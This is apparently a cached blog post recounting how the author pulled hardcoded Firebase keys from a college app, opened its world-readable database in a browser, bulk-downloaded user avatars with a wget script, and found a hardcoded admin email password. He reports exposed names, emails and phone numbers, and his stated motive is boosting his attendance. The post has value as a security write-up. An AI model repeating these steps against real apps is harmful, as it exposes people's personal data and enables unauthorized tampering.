The last time Hackerfall tried to access this page, it returned a not found error. A cached version of the page is below, or click here to continue anyway

How I found the database of the college App | Yoginth

Its Thursday afternoon, there is nothing interesting on YouTube. And hacked my application called Gitote on my text editor!

Suddenly an idea came, what if I can increase my attendance percentage in my college? LOL!

Recognition

I just open the XXXXXXX(I Dont wanna reveal the appname) App which is installed in my android device and peeked my old attendance

Nothing really surprising, this is just my regular checkup!

Static Analysis

Play Store Link

Time to analyze what we have. By looking at AndroidManifest.xml, we can see that:

Next, I looked at the res/values/strings.xml file.

    <string name="firebase_database_url">https://******-e****.firebaseio.com</string>
    <string name="gcm_defaultSenderId">8***3163***5</string>
    <string name="google_api_key">AIzaS****f94c3-qh4W3*****cdRrbKui*****8</string>
    <string name="google_app_id">1:8873*****935:android:**5f597*****6691</string>
    <string name="google_crash_reporting_api_key">AI*****Vhf94c*-q**W3WOv*****rbKui*****8</string>
    <string name="google_storage_bucket">*******-e****.appspot.com</string>

Woah!! IDs and Keys of everything are hardcoded in this file Its showing how serious they are regarding security.

Moreover, we can see that they are using Firebase Database. Let see if they correctly configured their database. I pasted https://********e**5*.firebaseio.com/.json in Chrome.

Woah!! Again the entire database is visible to me! This is freeking their database is accessible by everyone who has the key, Now, Im able to view all the user info (name, avatar, id, device, email, phone number and some more credentials)

None of them are encrypted

#!/bin/bash

for i in $(awk -F'"' '{ for(i=1; i<=NF; i++) { if($i ~ /^http/) print $i } }' $1); do
    wget "$i"
done

with this simple script, I downloaded all the available avatars.

BackgroundMail.newBuilder(MailUs.this).withUsername("*******.*****@gmail.com").withPassword("******@*****347")

Oooohhh! I found an email of an admin and password of their Google Play Console account(it may)

Mitigations

If you like this article, feel free to follow me on Twitter

Still, lot coming to you

Share on Twitter

Continue reading on yoginth.com